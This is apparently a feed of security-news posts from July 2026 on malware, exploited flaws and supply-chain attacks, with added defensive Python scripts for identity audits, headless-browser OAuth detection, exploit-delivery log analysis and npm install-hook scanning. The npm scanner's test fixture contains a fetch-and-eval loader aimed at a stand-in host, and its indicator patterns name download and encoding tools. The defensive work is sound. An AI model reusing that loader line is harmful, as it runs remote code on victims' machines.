AI agents don't trigger leaver events.
No HR record.
No manager.
No offboarding date.
IGA tools may see only a service account, while the agent's API access, OAuth grants, and stale credentials drift outside the human identity lifecycle.
Where the model breaks: https://thehackernews.com/2026/07/identity-lifecycle-management.html
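The gap above is concrete enough to check for. The script below is an added example, not any IGA product's code: it audits non-human identities (service accounts, OAuth grants, API keys) against the HR record so that the ones with no owner, a departed owner, no expiry, or long idle time surface even though no leaver event will ever fire for them. The records, field names, and the `example.test` accounts are constructed for the demo.

```python
"""Added example (not any IGA product's code): audit non-human identities
(service accounts, OAuth grants, API keys) against the HR record, so the
ones with no owner, a departed owner, no expiry, or long idle time surface
even though no leaver event will ever fire for them. Records and field
names below are constructed."""
from dataclasses import dataclass, field
from datetime import date
from typing import Optional

@dataclass
class Human:
    upn: str
    status: str                 # HR status: "active" or "terminated"

@dataclass
class NonHumanIdentity:
    name: str
    kind: str                   # "service_account", "oauth_grant", "api_key"
    owner: Optional[str]        # human UPN, or None when nobody is recorded
    created: date
    last_used: Optional[date]   # None when the credential has never been used
    expires: Optional[date]     # None when nothing will ever retire it
    scopes: list = field(default_factory=list)

SAMPLE_DATE = date(2026, 7, 15)

# Constructed sample inventory (not real accounts).
HUMANS = {
    "alice@example.test": Human("alice@example.test", "active"),
    "bob@example.test": Human("bob@example.test", "terminated"),
}
NHIS = [
    NonHumanIdentity("svc-billing-agent", "service_account", "alice@example.test",
                     date(2026, 1, 10), date(2026, 7, 1), date(2026, 12, 31)),
    NonHumanIdentity("oauth-crm-agent", "oauth_grant", "bob@example.test",
                     date(2025, 11, 2), date(2026, 6, 30), None,
                     ["https://www.googleapis.com/auth/gmail.readonly"]),
    NonHumanIdentity("key-legacy-export", "api_key", None,
                     date(2024, 3, 5), date(2025, 9, 1), None),
    NonHumanIdentity("svc-new-agent", "service_account", "alice@example.test",
                     date(2026, 6, 20), None, None),
]

def audit_nhi(nhis, humans, today, max_idle_days=90):
    """Return {identity name: [reasons]} for every NHI that needs a human decision."""
    findings = {}
    for nhi in nhis:
        reasons = []
        if nhi.owner is None:
            reasons.append("no owner recorded")
        elif nhi.owner not in humans:
            reasons.append(f"owner {nhi.owner} not found in HR data")
        elif humans[nhi.owner].status != "active":
            reasons.append(f"owner {nhi.owner} has left (HR status: {humans[nhi.owner].status})")
        if nhi.expires is None:
            reasons.append("no expiry / offboarding date")
        elif nhi.expires < today:
            reasons.append("expired but still present")
        # A never-used credential is idle since it was minted.
        idle_days = (today - (nhi.last_used or nhi.created)).days
        if idle_days > max_idle_days:
            reasons.append(f"idle for {idle_days} days")
        if reasons:
            findings[nhi.name] = reasons
    return findings

if __name__ == "__main__":
    for name, reasons in audit_nhi(NHIS, HUMANS, SAMPLE_DATE).items():
        print(f"{name}: " + "; ".join(reasons))
```

The point of joining the NHI inventory to the HR feed is the "owner has left" case: the human's leaver event fired, but nothing was wired to the grant they created, so it has to be found by lookup rather than by event.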
ToddyCat's Umbrij can turn an active Gmail session into Google API access.
Experts say it launches Chrome or Edge in headless mode, grabs an OAuth authorization code, and lets operators exchange it for an access token.
How the STRD attack chain works: https://thehackernews.com/2026/07/toddycat-linked-umbrij-malware-abuses.html
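A headless browser pointed at an OAuth authorization endpoint is unusual enough on an endpoint to alert on. The following is an added example, not ToddyCat tooling or any vendor's detection rule: it scans process-creation events for a Chrome or Edge launch with a `--headless` flag whose command line carries an authorization-code request to a Google OAuth host, which is the behaviour the post attributes to Umbrij. The event fields, parent-process list, OAuth host list, and command lines are constructed assumptions; real EDR or Sysmon telemetry uses different field names, and the exact flags Umbrij passes are not reproduced here.

```python
"""Added example (not ToddyCat tooling or any vendor's detection rule):
flag a headless Chrome/Edge launch whose command line points at an OAuth
authorization endpoint, the behaviour the post attributes to Umbrij.
Event fields and command lines below are constructed."""
import shlex
from urllib.parse import urlparse, parse_qs

BROWSERS = {"chrome.exe", "msedge.exe"}
OAUTH_HOSTS = {"accounts.google.com", "oauth2.googleapis.com"}  # assumed list
INTERACTIVE_PARENTS = {"explorer.exe"}  # assumed: a browser the user launched

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--profile-directory=Default https://mail.google.com/'},
    {"pid": 5332, "parent": "updater.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--headless=new --disable-gpu '
                r'"https://accounts.google.com/o/oauth2/v2/auth'
                r'?client_id=123.apps.googleusercontent.com'
                r'&redirect_uri=http%3A%2F%2F127.0.0.1%3A8089%2Fcb'
                r'&response_type=code'
                r'&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fgmail.readonly"'},
    {"pid": 6001, "parent": "svchost.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
                r'--headless https://example.test/report'},
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def oauth_requests(tokens):
    """Pull authorization-code requests to a known OAuth host out of argv."""
    found = []
    for tok in tokens:
        if not tok.lower().startswith(("http://", "https://")):
            continue
        parsed = urlparse(tok)
        query = parse_qs(parsed.query)   # also percent-decodes the values
        if parsed.hostname in OAUTH_HOSTS and query.get("response_type") == ["code"]:
            found.append({
                "host": parsed.hostname,
                "client_id": query.get("client_id", [""])[0],
                "redirect_uri": query.get("redirect_uri", [""])[0],
                "scope": query.get("scope", [""])[0].split(),
            })
    return found

def analyze(event):
    if basename(event["image"]) not in BROWSERS:
        return None
    # posix=False keeps Windows backslashes intact; strip the quotes ourselves.
    tokens = [t.strip('"') for t in shlex.split(event["cmdline"], posix=False)][1:]
    headless = any(t.lower().startswith("--headless") for t in tokens)
    oauth = oauth_requests(tokens)
    non_interactive = event["parent"].lower() not in INTERACTIVE_PARENTS
    if headless and oauth:
        severity = "high"     # headless browser driving an auth-code flow
    elif headless and non_interactive:
        severity = "medium"   # headless browser spawned by something other than the user
    else:
        return None
    return {"pid": event["pid"], "severity": severity, "parent": event["parent"],
            "headless": headless, "oauth": oauth}

def scan(events):
    return [f for f in (analyze(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

The `redirect_uri` and `scope` fields are extracted for the analyst because they tell you which client the code was minted for and what API access the resulting token buys; a loopback redirect on a high port with mail scopes is the shape to treat as a credential theft, not a browser automation job.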
#ThreatsDay Bulletin is live, and this week's threats were quiet, weird, and too easy to miss.
- Stolen AI compute
- BlueHammer ransomware
- Apple email flaw
- Fake INTERPOL ransomware
- ClickFix defenses
- BeepRAT espionage
- Millennium RAT
- UNC1151 phishing
- AI search hijack
- Teams bot controls
- GPT-5.6 Sol
- UNC5792 reward
- Prompt injection
- Anthropic tracking
- Device-aware phishing
- Amazon FTC fine
- Claude sandbox root
Read the full roundup: https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
Update - Citrix CVE-2026-8451 is now under active exploitation, less than 24 hours after disclosure.
A Frankfurt IP hit sensors for 5 hours, delivering the watchTowr exploit only after a 200 OK response and skipping 404s.
Learn how the malformed SAML exploit path works: https://thehackernews.com/2026/07/citrix-patches-six-netscaler-flaws.html
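That "fire only after a 200, skip the 404s" behaviour is a fingerprint you can pull out of ordinary access logs, independent of the exploit itself. The script below is an added example, not watchTowr's or Citrix's code: it groups requests by source IP and reports sources whose GET probes that returned 404 were left alone while a probe that returned 200 was followed within a short window by a POST to the same path. The log lines, IP addresses, and paths are constructed placeholders; the vulnerable endpoint and the malformed SAML request are not reproduced here.

```python
"""Added example (not watchTowr's or Citrix's code): spot the scan-then-fire
pattern in web access logs, where a source sends its follow-up request only
to paths that answered 200 and never to paths that answered 404. Log lines,
IPs and paths are constructed placeholders."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed log lines. 203.0.113.10 probes several paths and posts only where
# the probe got a 200; 198.51.100.7 is an ordinary SSO login (GET then POST).
SAMPLE_LOG = """\
203.0.113.10 - - [14/Jul/2026:09:02:11 +0000] "GET /cgi/samlauth HTTP/1.1" 404 196
203.0.113.10 - - [14/Jul/2026:09:02:12 +0000] "GET /saml/login HTTP/1.1" 200 5120
203.0.113.10 - - [14/Jul/2026:09:02:14 +0000] "POST /saml/login HTTP/1.1" 500 0
203.0.113.10 - - [14/Jul/2026:09:02:20 +0000] "GET /vpn/samlauth HTTP/1.1" 404 196
198.51.100.7 - - [14/Jul/2026:09:05:01 +0000] "GET /saml/login HTTP/1.1" 200 5120
198.51.100.7 - - [14/Jul/2026:09:05:09 +0000] "POST /saml/login HTTP/1.1" 302 0
"""

def parse(lines):
    """Yield (ip, timestamp, method, path, status) for each Common Log Format line."""
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def conditional_delivery(log_text, window=timedelta(seconds=30)):
    """Per source IP: how many GET probes got 200/404 and how many of each were
    followed by a POST to the same path within `window`."""
    by_ip = defaultdict(list)
    for rec in parse(log_text.splitlines()):
        by_ip[rec[0]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[1])
        stats = {"probes_200": 0, "probes_404": 0, "fired_after_200": 0, "fired_after_404": 0}
        for i, (_, t, method, path, status) in enumerate(recs):
            if method != "GET" or status not in (200, 404):
                continue
            key = str(status)
            stats[f"probes_{key}"] += 1
            followed = any(m2 == "POST" and p2 == path and t < t2 <= t + window
                           for _, t2, m2, p2, _ in recs[i + 1:])
            if followed:
                stats[f"fired_after_{key}"] += 1
        # The fingerprint: at least one 404 probe left alone, at least one 200 probe followed up.
        stats["scan_then_fire"] = (stats["probes_404"] > 0 and stats["fired_after_404"] == 0
                                   and stats["fired_after_200"] > 0)
        report[ip] = stats
    return report

if __name__ == "__main__":
    for ip, stats in conditional_delivery(SAMPLE_LOG).items():
        print(ip, stats)
```

The ordinary SSO user also does GET-then-POST, which is why the rule requires the 404 probes that were skipped: conditional delivery is the tell, not the POST itself.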
Ransomware crews are stacking three ugly paths into enterprise networks.
- Anubis: Citrix Bleed 2
- The Gentlemen: Go backdoor + BYOVD
- VECT/TeamPCP: supply-chain credential theft
How the attack paths connect: https://thehackernews.com/2026/07/ransomware-groups-turn-to-citrix-bleed.html
Google disrupted #NetNut, a proxy network spanning at least 2 million home devices.
In one June week, GTIG saw 316 threat clusters using suspected NetNut exit nodes to hide location and guess passwords.
The simple risk: your home IP becomes someone else's relay.
Learn more: https://thehackernews.com/2026/07/google-disrupts-netnut-residential.html
PamStealer targets Mac users through fake Maccy sites.
A compiled AppleScript stages a Rust stealer that validates the entered login password through PAM, then targets browsers, crypto wallets, iCloud Keychain, and clipboard content.
How the attack chain works: https://thehackernews.com/2026/07/pamstealer-uses-fake-maccy-sites-and.html
A member of the EU committee investigating spyware abuse was hacked with Pegasus while serving on it.
Citizen Lab says Stelios Kouloglou's #iPhone was compromised in Oct. 2022 and Mar. 2023, likely via a zero-click exploit targeting Apple's HomeKit.
Attackers could have accessed PEGA documents and deliberations.
Details: https://thehackernews.com/2026/07/european-parliament-member.html
#ThreatsDay this week reads like attackers opened the junk drawer of the internet and found everything still plugged in:
- exposed AI compute
- email privacy gaps
- fake browser extensions
- meeting bots
- clipboard tricks
- Defender flaws
- fake INTERPOL ransomware
Just an Empire State Building-sized amount of trust left unattended - https://thehackernews.com/2026/07/threatsday-ai-compute-hijacking-apple.html
Armored Likho targeted power and government agencies.
Kaspersky says the attacks span Russia, Brazil, and Kazakhstan, using BusySnake Stealer, GitHub-hosted payloads, Go2Tunnel reverse tunneling, and abuse of the already-patched LNK flaw CVE-2025-9491.
How the stealer chain works: https://thehackernews.com/2026/07/armored-likho-targets-government.html
Six malicious npm packages mimicked Rollup polyfill tools.
Researchers attribute them to North Korea-linked actors. The packages used hidden install-time execution and JSONKeeper fetches to load payloads for remote access and theft of browser, wallet, cloud, SSH, and npm secrets.
Read: https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html
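Install-time execution is the part of this chain a consumer can check for before anything runs. The script below is an added example, neither npm's tooling nor the malicious packages' code: it walks a `node_modules` tree, reports every package that declares a `preinstall`, `install`, `postinstall`, or `prepare` script, and, where the hook is `node <file>.js`, opens that file and looks for network, eval, or child-process calls. The sample tree, the package names, the indicator lists, and the `jsonkeeper.example` host are constructed for the demo.

```python
"""Added example (not npm's tooling and not the malicious packages' code):
walk a node_modules tree and report packages that run code at install time,
the mechanism the post describes. The sample tree, package names, and the
'jsonkeeper.example' host are constructed for the demo."""
import json
import os
import re
import tempfile

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Heuristics for commands/files worth a human look (assumed, not exhaustive).
CMD_INDICATORS = re.compile(r"node\s+-e|curl |wget |powershell|base64|Invoke-", re.I)
FILE_INDICATORS = re.compile(
    r"fetch\(|https?\.(get|request)\(|child_process|eval\(|Buffer\.from\([^)]*base64", re.I)

def find_install_scripts(root):
    """Return one finding per package whose package.json declares a lifecycle script."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue
        scripts = {k: v for k, v in (pkg.get("scripts") or {}).items() if k in LIFECYCLE}
        if not scripts:
            continue
        reasons = []
        for hook, cmd in scripts.items():
            if CMD_INDICATORS.search(cmd):
                reasons.append(f"{hook}: inline/downloader command")
            # "node something.js": open the script and look for network/exec calls.
            m = re.match(r"^node\s+([\w./-]+\.js)$", cmd.strip())
            if m:
                target = os.path.join(dirpath, m.group(1))
                try:
                    with open(target, encoding="utf-8") as fh:
                        if FILE_INDICATORS.search(fh.read()):
                            reasons.append(f"{hook}: {m.group(1)} performs network/exec calls")
                except OSError:
                    reasons.append(f"{hook}: references missing file {m.group(1)}")
        findings.append({"name": pkg.get("name", os.path.basename(dirpath)),
                         "scripts": scripts,
                         "severity": "high" if reasons else "review",
                         "reasons": reasons})
    return sorted(findings, key=lambda f: f["name"])

def write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)

def build_sample_tree(root):
    """Constructed node_modules: one legitimate native build, one lookalike that
    hides a postinstall loader, one package with no hooks at all."""
    nm = os.path.join(root, "node_modules")
    write(os.path.join(nm, "good-native", "package.json"),
          json.dumps({"name": "good-native", "scripts": {"install": "node-gyp rebuild"}}))
    write(os.path.join(nm, "rollup-polyfill-shim", "package.json"),
          json.dumps({"name": "rollup-polyfill-shim", "scripts": {"postinstall": "node setup.js"}}))
    write(os.path.join(nm, "rollup-polyfill-shim", "setup.js"),
          "fetch('https://jsonkeeper.example/x').then(r => r.text()).then(eval);\n")
    write(os.path.join(nm, "plain-lib", "package.json"),
          json.dumps({"name": "plain-lib", "scripts": {"test": "jest"}}))
    return nm

def demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_install_scripts(build_sample_tree(tmp))

if __name__ == "__main__":
    for f in demo():
        print(f["severity"], f["name"], f["scripts"], f["reasons"])
```

Run `find_install_scripts("node_modules")` against a real checkout to get the same report. A legitimate native module will show up as "review" because `node-gyp rebuild` is a lifecycle script too; the heuristics only rank, they do not decide. Installing with `npm ci --ignore-scripts` keeps hooks from running at all until someone has looked at that list.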
Avalon turns a PDF-themed .LNK into CrownX ransomware.
Proton Drive → ISO image → MSBuild → ETW tampering → HTTPS payload.
By the ransom note, credentials, C2, and recovery disruption are already in play.
Inside the attack chain: https://thehackernews.com/2026/07/new-avalon-malware-framework-packs.html
New "Bad Epoll" (CVE-2026-46242) vulnerability affects #Linux 6.4+ kernels and may reach newer #Android devices.
It can elevate a local user to root; the PoC reportedly hit 99% reliability and may be triggerable from Chrome's renderer sandbox.
Read how the bug works: https://thehackernews.com/2026/07/new-bad-epoll-linux-kernel-flaw-lets.html
New UNPATCHED FatFs vulnerabilities hit a filesystem library bundled into potentially MILLIONS of embedded devices.
Malformed USB drives, SD cards, or update files can trigger memory corruption, crashes, leaks, or hangs.
Read details here: https://thehackernews.com/2026/07/unpatched-flaws-disclosed-in-filesystem.html